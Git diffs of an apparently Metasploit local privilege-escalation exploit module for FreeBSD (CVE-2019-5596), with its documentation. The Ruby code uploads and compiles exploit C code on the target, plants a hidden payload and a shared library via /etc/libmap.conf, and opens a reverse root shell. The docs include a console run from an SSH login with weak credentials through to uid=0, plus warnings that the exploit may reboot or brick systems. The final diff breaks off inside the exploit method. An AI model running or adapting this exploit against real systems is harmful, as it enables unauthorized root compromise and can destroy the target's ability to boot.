--- a/documentation/modules/exploit/freebsd/local/freebsd_fd_ref_count_priv_esc.md
+++ b/documentation/modules/exploit/freebsd/local/freebsd_fd_ref_count_priv_esc.md
@@ -36,6 +36,11 @@ This exploit can take between 20 and 60 minutes to exploit, with no feedback.
 If the system reboots due to a failed exploitation attempt, no notification is seen
 within metasploit until the 60 minute timeout window happens.
 
+### Vulnerable Application
+
+`kern.maxfiles` may need to be altered, and the higher the value, the more likely successful exploitation.  This value can be set by root by running
+`sysctl kern.maxfiles=70000`.
+
 ## Verification Steps
 
   1. Start msfconsole

--- a/documentation/modules/exploit/freebsd/local/freebsd_fd_ref_count_priv_esc.md
+++ b/documentation/modules/exploit/freebsd/local/freebsd_fd_ref_count_priv_esc.md
@@ -1,0 +1,127 @@
+## Vulnerable Application
+
+FreeBSD 12.0 (and some 11) attempts to handle the case where the receiving process does
+not provide a sufficiently large buffer for an incoming control message
+containing rights.  In particular, to avoid leaking the corresponding
+descriptors into the receiving process' descriptor table, the kernel handles
+the truncation case by closing descriptors referenced by the discarded
+message.
+
+The code which performs this operation failed to release a reference obtained
+on the file corresponding to a received right.  This bug can be used to cause
+the reference counter to wrap around and free the file structure.
+
+Exploitation results in write access to `/etc/libmap.conf` where a new dynamic
+object is added which includes our payload.
+
+A very detailed write-up is available at [secfault-security.com](https://secfault-security.com/blog/FreeBSD-SA-1902.fd.html)
+
+### Warnings
+
+This exploit is tempermental, often resulting in a system reboot.
+Successful exploitation will alter `/etc/libmap.conf`.  If the added library
+`libno_ex.so.1.0` is deleted, the system will brick.  Attempts to restore
+`/etc/libmap.conf` automatically fail.  Manually reverting the
+file from the root prompt should be successful though.
+
+### Warnings 2
+
+Canceling execution of this exploit may case a system reboot,
+or cause the system to brick.  If the system reboots, artifacts will
+remain on disk and require manual cleanup.
+
+### Warnings 3
+
+This exploit can take between 20 and 60 minutes to exploit, with no feedback.
+If the system reboots due to a failed exploitation attempt, no notification is seen
+within metasploit until the 60 minute timeout window happens.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Get a user shell
+  3. Do: ```use exploit/freebsd/local/freebsd_fd_ref_count_priv_esc```
+  4. Do: ```set session [#]```
+  5. Do: ```run```
+  6. You should get a root shell between 20 and 60 minutes later.
+
+## Options
+
+  **Forks**
+
+  Set the number of forks to use.  May need to be adjusted based on system RAM.  Default is `3`
+
+  **Threads**
+
+  Set the number of threads per fork.  May need to be adjusted based on system RAM.  Default is `400`
+
+## Scenarios
+
+### FreeBSD 12.0 r341666 with kern.maxfiles 70000
+
+  Exploitation with 70,000 `maxfiles` seems to be 100% with 1gig of ram in a virtual machine.
+
+  ```
+resource (freebsd.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (freebsd.rb)> set username user
+username => user
+resource (freebsd.rb)> set password user
+password => user
+resource (freebsd.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (freebsd.rb)> exploit
+[+] 2.2.2.2:22 - Success: 'user:user' ''
+[*] Command shell session 1 opened (1.1.1.1:42135 -> 2.2.2.2:22) at 2020-01-09 19:41:17 -0500
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (freebsd.rb)> use exploit/freebsd/local/freebsd_fd_ref_count_priv_esc
+resource (freebsd.rb)> set verbose true
+verbose => true
+resource (freebsd.rb)> set session 1
+session => 1
+resource (freebsd.rb)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (freebsd.rb)> check
+[+] cc is installed
+[+] FreeBSD release 12.0-RELEASE rev r341666 with maxfiles 70000 is vulnerable
+[+] The target is vulnerable.
+resource (freebsd.rb)> exploit
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[+] cc is installed
+[+] FreeBSD release 12.0-RELEASE rev r341666 with maxfiles 70000 is vulnerable
+[*] Stored /etc/libmap.conf in loot.  If session cleanup is unsuccessful, system will brick. Use this to unbrick
+[*] Writing '/tmp/.4arU1qp' (230 bytes) ...
+[*] Max line length is 131073
+[*] Writing 230 bytes in 1 chunks of 656 bytes (octal-encoded), using printf
+[+] cc is installed
+[*] Live compiling exploit on system...
+[*] Writing '/tmp/.BtNP7k.c' (13201 bytes) ...
+[*] Max line length is 131073
+[*] Writing 13201 bytes in 1 chunks of 47760 bytes (octal-encoded), using printf
+[*] Writing '/tmp/.aauI7Ac.c' (231 bytes) ...
+[*] Max line length is 131073
+[*] Writing 231 bytes in 1 chunks of 836 bytes (octal-encoded), using printf
+[*] Writing '/tmp/.yknTtnS8.sh' (92 bytes) ...
+[*] Max line length is 131073
+[*] Writing 92 bytes in 1 chunks of 335 bytes (octal-encoded), using printf
+[*] Launching exploit... May take 50-60 minutes. Start time: 2020-01-09 19:41:39 -0500
+[*] [!] write_to_file: Could not stick thread to core: Invalid argument
+[*] Command shell session 2 opened (1.1.1.1:4444 -> 2.2.2.2:25496) at 2020-01-09 20:01:02 -0500
+[+] Deleted /tmp/.4arU1qp
+[+] Deleted /tmp/.BtNP7k
+[!] Tried to delete /tmp/.aauI7Ac, unknown result
+[+] Deleted /tmp/.yknTtnS8.sh
+[*] Performing Cleanup
+[-] *************************************************
+[+] Automated attempt to not brick the system failed.
+[+] Please run `cp /tmp/libmap.conf /etc/libmap.conf`.
+[-] *************************************************
+
+id
+uid=0(root) gid=0(wheel) groups=0(wheel)
+cp /tmp/libmap.conf /etc/libmap.conf
+uname -a
+FreeBSD freebsd 12.0-RELEASE FreeBSD 12.0-RELEASE r341666 GENERIC  amd64
+sysctl kern.maxfiles
+kern.maxfiles: 70000
+  ```

--- a/modules/exploits/freebsd/local/freebsd_fd_ref_count_priv_esc.rb
+++ b/modules/exploits/freebsd/local/freebsd_fd_ref_count_priv_esc.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Local
-  Rank = AverageRanking
+  Rank = ManualRanking
 
   include Msf::Post::Linux::Priv
   include Msf::Post::Linux::Compile
@@ -51,22 +51,22 @@ class MetasploitModule < Msf::Exploit::Local
           ],
         'Platform'       => [ 'bsd' ],
         'Arch'           => [ ARCH_X64, ARCH_CMD ],
-        'SessionTypes'   => [ 'shell', 'meterpreter' ],
+        'SessionTypes'   => [ 'shell' ],
         'Targets'        => [[ 'Auto', {} ]],
         'Privileged'     => true,
         'References'     =>
           [
-            [ 'EDB', '47829' ],
-            [ 'URL', 'https://www.freebsd.org/security/advisories/FreeBSD-SA-19:02.fd.asc'],
-            [ 'URL', 'https://secfault-security.com/blog/FreeBSD-SA-1902.fd.html'],
-            [ 'CVE', '2019-5596']
+            ['EDB', '47829'],
+            ['URL', 'https://www.freebsd.org/security/advisories/FreeBSD-SA-19:02.fd.asc'],
+            ['URL', 'https://secfault-security.com/blog/FreeBSD-SA-1902.fd.html'],
+            ['CVE', '2019-5596']
           ],
         'Notes'         => {
           'Stability'   => [CRASH_OS_RESTARTS],
           'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS]
         },
         'DefaultOptions' => {
-          'WfsDelay' => 3600, # 60min
+          'WfsDelay' => 4_200, # 70min
           'PAYLOAD' => 'bsd/x64/shell_reverse_tcp',
           'PrependSetuid' => true,
         },
@@ -89,22 +89,9 @@ class MetasploitModule < Msf::Exploit::Local
     datastore['WritableDir'].to_s
   end
 
-  # Simplify and standardize uploading a file
-  def upload(path, data)
-    print_status "Writing '#{path}' (#{data.size} bytes) ..."
-    write_file path, data
-  end
-
-  # Simplify uploading and chmoding a file
-  def upload_and_chmodx(path, data)
-    upload path, data
-    chmod path
-    register_file_for_cleanup path
-  end
-
   # Simplify uploading and compiling a file
   def upload_and_compile(path, data, cc_cmd='')
-    upload "#{path}.c", data
+    write_file "#{path}.c", data
 
     if session.type.eql? 'shell'
       cc_cmd = "PATH=$PATH:/usr/bin/ #{cc_cmd}"
@@ -125,11 +112,6 @@ class MetasploitModule < Msf::Exploit::Local
     command_exists? 'cc'
   rescue
     raise 'Unable to check for cc'
-  end
-
-  # Pull the exploit binary or file (.c typically) from our system
-  def exploit_data(file)
-    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-5596', file)
   end
 
   def check
@@ -198,26 +180,31 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with Failure::BadConfig, "#{base_dir} is not writable"
     end
 
-    libmap = read_file('/etc/libmap.conf')
+    libmap = read_file('/etc/libmap.conf').to_s
     p = store_loot('libmap.conf', 'text/plain', datastore['RHOST'], libmap, 'Backup of libmap.conf')
-    print_status 'Stored /etc/libmap.conf in loot.  If session cleanup is unsuccessful, system will brick. Use this to unbrick'
+    print_status "Stored /etc/libmap.conf in #{p}.  If session cleanup is unsuccessful, system will brick. Use this to unbrick"
 
     # Upload payload executable
     payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    vprint_status("Uploading Payload to #{payload_path}")
     upload_and_chmodx payload_path, generate_payload_exe
 
     # Upload exploit executable, writing to a random name so AV doesn't have too easy a job
     executable_name = ".#{rand_text_alphanumeric(5..10)}"
     executable_path = "#{base_dir}/#{executable_name}"
-    stub_name = ".#{rand_text_alphanumeric(5..10)}"
-    stub_path = "#{base_dir}/#{stub_name}"
     vprint_status 'Live compiling exploit on system...'
-    hcw = exploit_data('heavy_cyber_weapon.c').gsub('/tmp/', "#{base_dir}/")
+    hcw = exploit_data('CVE-2019-5596', 'heavy_cyber_weapon.c').gsub('/tmp/', "#{base_dir}/")
     hcw = hcw.gsub('#define NUM_THREADS 400', "#define NUM_THREADS #{datastore['Threads']}")
     hcw = hcw.gsub('#define NUM_FORKS 3', "#define NUM_FORKS #{datastore['Forks']}")
+    vprint_status("Uploading exploit to #{executable_path}")
     upload_and_compile executable_path, strip_comments(hcw), "cc -o #{executable_path} -lpthread #{executable_path}.c"
     rm_f "#{executable_path}.c"
-    stub = exploit_data('program.c')
+
+    # upload stub
+    stub_name = ".#{rand_text_alphanumeric(5..10)}"
+    stub_path = "#{base_dir}/#{stub_name}"
+    stub = exploit_data('CVE-2019-5596', 'program.c')
+    vprint_status("Uploading Payload Stub to #{stub_path}")
     upload_and_compile stub_path, strip_comments(stub), "cc -o #{stub_path}.o -c #{stub_path}.c -fPIC"
     cmd_exec "cc -shared -Wl,-soname,libno_ex.so.1 -o #{base_dir}/libno_ex.so.1.0 #{stub_path}.o -nostartfiles"
     rm_f "#{stub_path}.c"
@@ -228,18 +215,19 @@ class MetasploitModule < Msf::Exploit::Local
     # umask was in the original exploit, however it seemed to cause the exploit to fail when ported to msf
     runner = %Q{
 #!/bin/sh
-cp /etc/libmap.conf #{base_dir}/libmap.conf
-#{executable_path}
-su
-/tmp/xxxx -c #{payload_path}&
+cp /etc/libmap.conf #{base_dir}/libmap.conf;
+#{executable_path};
+su;
+#{base_dir}/xxxx -c #{payload_path} &
 }
+
+    vprint_status("Uploading Payload Runner to #{runner_path}")
     upload_and_chmodx runner_path, runner
 
     # Launch exploit with a timeout.  We also have a vprint_status so if the user wants all the
     # output from the exploit being run, they can optionally see it
-    timeout = 3600 #60min
+    timeout = 4_200 #70min
     print_status "Launching exploit... May take 20-60 minutes. Start time: #{Time.now}"
-    cmd_exec "cd #{base_dir}"
     # for unknown reasons, when output isn't redirected, the exploit seems to fail.
     cmd_exec "#{runner_path} > /dev/null" , nil, timeout
   end

--- a/modules/exploits/freebsd/local/freebsd_fd_ref_count_priv_esc.rb
+++ b/modules/exploits/freebsd/local/freebsd_fd_ref_count_priv_esc.rb
@@ -32,6 +32,12 @@ class MetasploitModule < Msf::Exploit::Local
           Exploitation results in write access to /etc/libmap.conf where a new dynamic
           object is added which includes our payload.
 
+          WARNING: This exploit is tempermental, often resulting in a system reboot.
+          Successful exploitation will alter /etc/libmap.conf.  If the added library
+          libno_ex.so.1.0 is deleted, the system will brick.  Attempts to restore
+          /etc/libmap.conf automatically fail.  Manually reverting the
+          file from the root prompt should be successful though.
+
           WARNING: Canceling execution of this exploit may case a system reboot,
           or cause the system to brick.  If the system reboots, artifacts will
           remain on disk and require manual cleanup.
@@ -41,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Local
           [
             'h00die', # msf module
             'Peter Holm', # original analysis
-            'Karsten König' # poc and edb module
+            'Karsten König <karsten@secfault-security.com>' # poc and edb module
           ],
         'Platform'       => [ 'bsd' ],
         'Arch'           => [ ARCH_X64, ARCH_CMD ],
@@ -52,6 +58,7 @@ class MetasploitModule < Msf::Exploit::Local
           [
             [ 'EDB', '47829' ],
             [ 'URL', 'https://www.freebsd.org/security/advisories/FreeBSD-SA-19:02.fd.asc'],
+            [ 'URL', 'https://secfault-security.com/blog/FreeBSD-SA-1902.fd.html'],
             [ 'CVE', '2019-5596']
           ],
         'Notes'         => {
@@ -60,15 +67,13 @@ class MetasploitModule < Msf::Exploit::Local
         },
         'DefaultOptions' => {
           'WfsDelay' => 3600, # 60min
-          'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'
+          'PAYLOAD' => 'bsd/x64/shell_reverse_tcp',
+          'PrependSetuid' => true,
         },
         'DisclosureDate' => "Feb 05 2019",
         'DefaultTarget'  => 0
       )
     )
-    register_options [
-      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ])
-    ]
     # force exploit is used to bypass the check command results
     register_advanced_options [
       OptInt.new('Forks',  [ false, 'Number of forks to use', 3 ]),
@@ -127,20 +132,6 @@ class MetasploitModule < Msf::Exploit::Local
     ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-5596', file)
   end
 
-  # If we're going to live compile on the system, check cc is installed
-  def live_compile?
-    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
-
-    if has_cc?
-      vprint_good 'cc is installed'
-      return true
-    end
-
-    unless datastore['COMPILE'].eql? 'Auto'
-      fail_with Failure::BadConfig, 'cc is not installed. Compiling will fail.'
-    end
-  end
-
   def check
     # Check the kernel version to see if its in a vulnerable range
     release = cmd_exec('/sbin/sysctl kern.version').split(' ')
@@ -164,8 +155,16 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe
     end
 
-    if not file?('/etc/libmap.conf')
+    unless file?('/etc/libmap.conf')
       vprint_error('File /etc/libmap.conf not found, and is required for exploitation.')
+      return CheckCode::Safe
+    end
+
+    cc = has_cc?
+    if cc
+      vprint_good 'cc is installed'
+    else
+      print_error 'cc is required for compiling'
       return CheckCode::Safe
     end
 
@@ -212,56 +211,56 @@ class MetasploitModule < Msf::Exploit::Local
     executable_path = "#{base_dir}/#{executable_name}"
     stub_name = ".#{rand_text_alphanumeric(5..10)}"
     stub_path = "#{base_dir}/#{stub_name}"
-    if live_compile?
-      vprint_status 'Live compiling exploit on system...'
-      hcw = exploit_data('heavy_cyber_weapon.c').gsub('/tmp/', "#{base_dir}/")
-      hcw = hcw.gsub('#define NUM_THREADS 400', "#define NUM_THREADS #{datastore['Threads']}")
-      hcw = hcw.gsub('#define NUM_FORKSS 3', "#define NUM_FORKS #{datastore['Forks']}")
-      upload_and_compile executable_path, strip_comments(hcw), "cc -o #{executable_path} -lpthread #{executable_path}.c"
-      rm_f "#{executable_path}.c"
-      #stub = exploit_data('program.c').gsub('/tmp/xxxx', payload_path)
-      stub = exploit_data('program.c')
-      upload_and_compile stub_path, strip_comments(stub), "cc -o #{stub_path}.o -c #{stub_path}.c -fPIC"
-      cmd_exec "cc -shared -Wl,-soname,libno_ex.so.1 -o #{base_dir}/libno_ex.so.1.0 #{stub_path}.o -nostartfiles"
-      rm_f "#{stub_path}.c"
-      rm_f "#{stub_path}.o"
+    vprint_status 'Live compiling exploit on system...'
+    hcw = exploit_data('heavy_cyber_weapon.c').gsub('/tmp/', "#{base_dir}/")
+    hcw = hcw.gsub('#define NUM_THREADS 400', "#define NUM_THREADS #{datastore['Threads']}")
+    hcw = hcw.gsub('#define NUM_FORKS 3', "#define NUM_FORKS #{datastore['Forks']}")
+    upload_and_compile executable_path, strip_comments(hcw), "cc -o #{executable_path} -lpthread #{executable_path}.c"
+    rm_f "#{executable_path}.c"
+    stub = exploit_data('program.c')
+    upload_and_compile stub_path, strip_comments(stub), "cc -o #{stub_path}.o -c #{stub_path}.c -fPIC"
+    cmd_exec "cc -shared -Wl,-soname,libno_ex.so.1 -o #{base_dir}/libno_ex.so.1.0 #{stub_path}.o -nostartfiles"
+    rm_f "#{stub_path}.c"
+    rm_f "#{stub_path}.o"
 
-      runner_name = ".#{rand_text_alphanumeric(5..10)}.sh"
-      runner_path = "#{base_dir}/#{runner_name}"
-      runner = %Q{
-#!/bin/bash
+    runner_name = ".#{rand_text_alphanumeric(5..10)}.sh"
+    runner_path = "#{base_dir}/#{runner_name}"
+    # umask was in the original exploit, however it seemed to cause the exploit to fail when ported to msf
+    runner = %Q{
+#!/bin/sh
 cp /etc/libmap.conf #{base_dir}/libmap.conf
 #{executable_path}
 su
 /tmp/xxxx -c #{payload_path}&
 }
-      upload_and_chmodx runner_path, runner
-    else
-      vprint_status 'Dropping pre-compiled exploit on system...'
-      vprint_error 'not created yet'
-      return 0
-      #upload_and_chmodx executable_path, exploit_data('example')
-    end
+    upload_and_chmodx runner_path, runner
 
     # Launch exploit with a timeout.  We also have a vprint_status so if the user wants all the
     # output from the exploit being run, they can optionally see it
     timeout = 3600 #60min
-    print_status "Launching exploit... May take 50-60 minutes. Start time: #{Time.now}"
+    print_status "Launching exploit... May take 20-60 minutes. Start time: #{Time.now}"
     cmd_exec "cd #{base_dir}"
-    puts 'XXX dont forget output redirect'
-    output = cmd_exec "#{runner_path} > /tmp/output" , nil, timeout
-    output.each_line { |line| vprint_status line.chomp }
+    # for unknown reasons, when output isn't redirected, the exploit seems to fail.
+    cmd_exec "#{runner_path} > /dev/null" , nil, timeout
   end
 
   def on_new_session(session)
     super
+    # Cleanup will only work if the libmap.conf re-write happened.
     print_status 'Performing Cleanup'
-    ['/tmp/dummy', '/tmp/dummy2', '/tmp/pwn', '/tmp/pwn2', '/tmp/sync_forks*'].each do |clean|
-      rm_f clean
+    # we avoid deleting libno_ex.so.1.0 since *if* the libmap.conf change didn't go well
+    # we may still brick the system if the file is removed.
+    ['dummy', 'dummy2', 'pwn', 'pwn2', 'sync_forks', 'xxxx'].each do |clean|
+      rm_f "#{base_dir}/#{clean}"
     end
 
-    print_good 'Replacing /etc/libmap.conf with looted one to prevent bricking system'
-    write_file '/etc/libmap.conf', libmap
-    cmd_exec "/bin/cp #{base_dir/libmap.conf} /etc/libmap.conf"
+    for num in 1...datastore['Forks'] do
+      rm_f "#{base_dir}/sync_forks#{num}"
+    end
+
+    print_error "*************************************************"
+    print_good 'Automated attempt to not brick the system failed.'
+    print_good "Please run `cp #{base_dir}/libmap.conf /etc/libmap.conf`."
+    print_error "*************************************************"
   end
 end

--- a/modules/exploits/freebsd/local/freebsd_fd_ref_count_priv_esc.rb
+++ b/modules/exploits/freebsd/local/freebsd_fd_ref_count_priv_esc.rb
@@ -8,8 +8,6 @@ class MetasploitModule < Msf::Exploit::Local
 
   include Msf::Post::Linux::Priv
   include Msf::Post::Linux::Compile
-  #include Msf::Post::Linux::System
-  #include Msf::Post::Linux::Kernel
   include Msf::Post::File
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
@@ -20,10 +18,23 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name'           => 'FreeBSD File Descriptor Ref Count Priv Esc',
         'Description'    => %q(
-            This exploit module illustrates how a vulnerability could be exploited
-          in an linux command for priv esc.
+          FreeBSD 12.0 attempts to handle the case where the receiving process does
+          not provide a sufficiently large buffer for an incoming control message
+          containing rights.  In particular, to avoid leaking the corresponding
+          descriptors into the receiving process' descriptor table, the kernel handles
+          the truncation case by closing descriptors referenced by the discarded
+          message.
 
-            WARNING: Canceling execution of this exploit will case a system reboot.
+          The code which performs this operation failed to release a reference obtained
+          on the file corresponding to a received right.  This bug can be used to cause
+          the reference counter to wrap around and free the file structure.
+
+          Exploitation results in write access to /etc/libmap.conf where a new dynamic
+          object is added which includes our payload.
+
+          WARNING: Canceling execution of this exploit may case a system reboot,
+          or cause the system to brick.  If the system reboots, artifacts will
+          remain on disk and require manual cleanup.
         ),
         'License'        => MSF_LICENSE,
         'Author'         =>
@@ -60,7 +71,9 @@ class MetasploitModule < Msf::Exploit::Local
     ]
     # force exploit is used to bypass the check command results
     register_advanced_options [
+      OptInt.new('Forks',  [ false, 'Number of forks to use', 3 ]),
       OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
+      OptInt.new('Threads',  [ false, 'Number of threads to use', 400 ]),
       OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
     ]
 
@@ -186,7 +199,8 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with Failure::BadConfig, "#{base_dir} is not writable"
     end
 
-    p = store_loot('libmap.conf', 'text/plain', datastore['RHOST'], read_file('/etc/libmap.conf'), 'Backup of libmap.conf')
+    libmap = read_file('/etc/libmap.conf')
+    p = store_loot('libmap.conf', 'text/plain', datastore['RHOST'], libmap, 'Backup of libmap.conf')
     print_status 'Stored /etc/libmap.conf in loot.  If session cleanup is unsuccessful, system will brick. Use this to unbrick'
 
     # Upload payload executable
@@ -200,9 +214,13 @@ class MetasploitModule < Msf::Exploit::Local
     stub_path = "#{base_dir}/#{stub_name}"
     if live_compile?
       vprint_status 'Live compiling exploit on system...'
-      upload_and_compile executable_path, strip_comments(exploit_data('heavy_cyber_weapon.c')), "cc -o #{executable_path} -lpthread #{executable_path}.c"
+      hcw = exploit_data('heavy_cyber_weapon.c').gsub('/tmp/', "#{base_dir}/")
+      hcw = hcw.gsub('#define NUM_THREADS 400', "#define NUM_THREADS #{datastore['Threads']}")
+      hcw = hcw.gsub('#define NUM_FORKSS 3', "#define NUM_FORKS #{datastore['Forks']}")
+      upload_and_compile executable_path, strip_comments(hcw), "cc -o #{executable_path} -lpthread #{executable_path}.c"
       rm_f "#{executable_path}.c"
-      stub = exploit_data('program.c').gsub('/tmp/xxxx', payload_path)
+      #stub = exploit_data('program.c').gsub('/tmp/xxxx', payload_path)
+      stub = exploit_data('program.c')
       upload_and_compile stub_path, strip_comments(stub), "cc -o #{stub_path}.o -c #{stub_path}.c -fPIC"
       cmd_exec "cc -shared -Wl,-soname,libno_ex.so.1 -o #{base_dir}/libno_ex.so.1.0 #{stub_path}.o -nostartfiles"
       rm_f "#{stub_path}.c"
@@ -210,10 +228,12 @@ class MetasploitModule < Msf::Exploit::Local
 
       runner_name = ".#{rand_text_alphanumeric(5..10)}.sh"
       runner_path = "#{base_dir}/#{runner_name}"
-      runner = %Q{#!/bin/bash
+      runner = %Q{
+#!/bin/bash
+cp /etc/libmap.conf #{base_dir}/libmap.conf
 #{executable_path}
 su
-#{payload_path}
+/tmp/xxxx -c #{payload_path}&
 }
       upload_and_chmodx runner_path, runner
     else
@@ -226,34 +246,22 @@ su
     # Launch exploit with a timeout.  We also have a vprint_status so if the user wants all the
     # output from the exploit being run, they can optionally see it
     timeout = 3600 #60min
-    print_status "Launching exploit... May take up to 60 minutes. Start time: #{Time.now}"
-    output = cmd_exec "#{runner_path}", nil, timeout
+    print_status "Launching exploit... May take 50-60 minutes. Start time: #{Time.now}"
+    cmd_exec "cd #{base_dir}"
+    puts 'XXX dont forget output redirect'
+    output = cmd_exec "#{runner_path} > /tmp/output" , nil, timeout
     output.each_line { |line| vprint_status line.chomp }
-    if setuid?(payload_path)
-      print_good 'Payload suid set, launching root payload'
-      cmd_exec 'su'
-      cmd_exec payload_path
-    else
-      print_error("no suid on #{payload_path}")
-    end
+  end
+
+  def on_new_session(session)
+    super
     print_status 'Performing Cleanup'
-    #rm_f stub_path
-    #rm_f payload_path
-    #rm_f executable_path
-    #rm_f runner_path
-
-    rm_f '/tmp/dummy'
-    rm_f '/tmp/dummy2'
-    rm_f '/tmp/pwn'
-    rm_f '/tmp/pwn2'
-    rm_f '/tmp/sync_forks'
-    rm_f '/tmp/sync_forks1'
-    rm_f '/tmp/sync_forks2'
-    rm_f '/tmp/sync_forks3'
-
-    def on_new_session
-      print_good 'Replacing /etc/libmap.conf with /tmp/libmap.conf to prevent bricking system'
-      cmd_exec 'cp /tmp/libmap.conf /etc/libmap.conf'
+    ['/tmp/dummy', '/tmp/dummy2', '/tmp/pwn', '/tmp/pwn2', '/tmp/sync_forks*'].each do |clean|
+      rm_f clean
     end
+
+    print_good 'Replacing /etc/libmap.conf with looted one to prevent bricking system'
+    write_file '/etc/libmap.conf', libmap
+    cmd_exec "/bin/cp #{base_dir/libmap.conf} /etc/libmap.conf"
   end
 end

--- a/modules/exploits/freebsd/local/freebsd_fd_ref_count_priv_esc.rb
+++ b/modules/exploits/freebsd/local/freebsd_fd_ref_count_priv_esc.rb
@@ -1,0 +1,259 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = AverageRanking
+
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::Compile
+  #include Msf::Post::Linux::System
+  #include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'FreeBSD File Descriptor Ref Count Priv Esc',
+        'Description'    => %q(
+            This exploit module illustrates how a vulnerability could be exploited
+          in an linux command for priv esc.
+
+            WARNING: Canceling execution of this exploit will case a system reboot.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'h00die', # msf module
+            'Peter Holm', # original analysis
+            'Karsten König' # poc and edb module
+          ],
+        'Platform'       => [ 'bsd' ],
+        'Arch'           => [ ARCH_X64, ARCH_CMD ],
+        'SessionTypes'   => [ 'shell', 'meterpreter' ],
+        'Targets'        => [[ 'Auto', {} ]],
+        'Privileged'     => true,
+        'References'     =>
+          [
+            [ 'EDB', '47829' ],
+            [ 'URL', 'https://www.freebsd.org/security/advisories/FreeBSD-SA-19:02.fd.asc'],
+            [ 'CVE', '2019-5596']
+          ],
+        'Notes'         => {
+          'Stability'   => [CRASH_OS_RESTARTS],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS]
+        },
+        'DefaultOptions' => {
+          'WfsDelay' => 3600, # 60min
+          'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'
+        },
+        'DisclosureDate' => "Feb 05 2019",
+        'DefaultTarget'  => 0
+      )
+    )
+    register_options [
+      OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ])
+    ]
+    # force exploit is used to bypass the check command results
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [ false, 'Override check result', false ]),
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+
+  end
+
+  # Simplify pulling the writable directory variable
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  # Simplify and standardize uploading a file
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    write_file path, data
+  end
+
+  # Simplify uploading and chmoding a file
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+    register_file_for_cleanup path
+  end
+
+  # Simplify uploading and compiling a file
+  def upload_and_compile(path, data, cc_cmd='')
+    upload "#{path}.c", data
+
+    if session.type.eql? 'shell'
+      cc_cmd = "PATH=$PATH:/usr/bin/ #{cc_cmd}"
+    end
+
+    output = cmd_exec cc_cmd
+
+    unless output.blank?
+      print_error output
+      fail_with Failure::Unknown, "#{path}.c failed to compile"
+    end
+
+    register_file_for_cleanup path
+    chmod path
+  end
+
+  def has_cc?
+    command_exists? 'cc'
+  rescue
+    raise 'Unable to check for cc'
+  end
+
+  # Pull the exploit binary or file (.c typically) from our system
+  def exploit_data(file)
+    ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2019-5596', file)
+  end
+
+  # If we're going to live compile on the system, check cc is installed
+  def live_compile?
+    return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
+
+    if has_cc?
+      vprint_good 'cc is installed'
+      return true
+    end
+
+    unless datastore['COMPILE'].eql? 'Auto'
+      fail_with Failure::BadConfig, 'cc is not installed. Compiling will fail.'
+    end
+  end
+
+  def check
+    # Check the kernel version to see if its in a vulnerable range
+    release = cmd_exec('/sbin/sysctl kern.version').split(' ')
+    major = release[2]
+    rev = Gem::Version.new(release[3].delete('r'))
+
+    if major.include? '12'
+      if major.include? 'STABLE' and rev > Gem::Version.new('343781')
+        vprint_error("FreeBSD release #{major} rev r#{rev} is not vulnerable.")
+        return CheckCode::Safe
+      end
+      if major.include? 'RELEASE' and rev >= Gem::Version.new('343790')
+        vprint_error("FreeBSD release #{major} rev r#{rev} is not vulnerable.")
+        return CheckCode::Safe
+      end
+    elsif major.include? '11' and (rev <= Gem::Version.new('338618') or rev >= Gem::Version.new('343786'))
+      vprint_error("FreeBSD release #{major} rev r#{rev} is not vulnerable.")
+      return CheckCode::Safe
+    else
+      vprint_error("FreeBSD release #{major} rev r#{rev} is not vulnerable.")
+      return CheckCode::Safe
+    end
+
+    if not file?('/etc/libmap.conf')
+      vprint_error('File /etc/libmap.conf not found, and is required for exploitation.')
+      return CheckCode::Safe
+    end
+
+    maxfiles = cmd_exec('sysctl kern.maxfiles').split(' ')[1]
+    if maxfiles.to_i < 64303
+      vprint_error('In testing, when kern.maxfiles is < 60000 the exploit will most likely fail and reboot the system.')
+      return CheckCode::Detected #detected, it is vuln, but not exploitable from our testing, but maybe for others?
+    end
+
+    vprint_good "FreeBSD release #{major} rev r#{rev} with maxfiles #{maxfiles} is vulnerable"
+    CheckCode::Vulnerable
+  end
+
+  def exploit
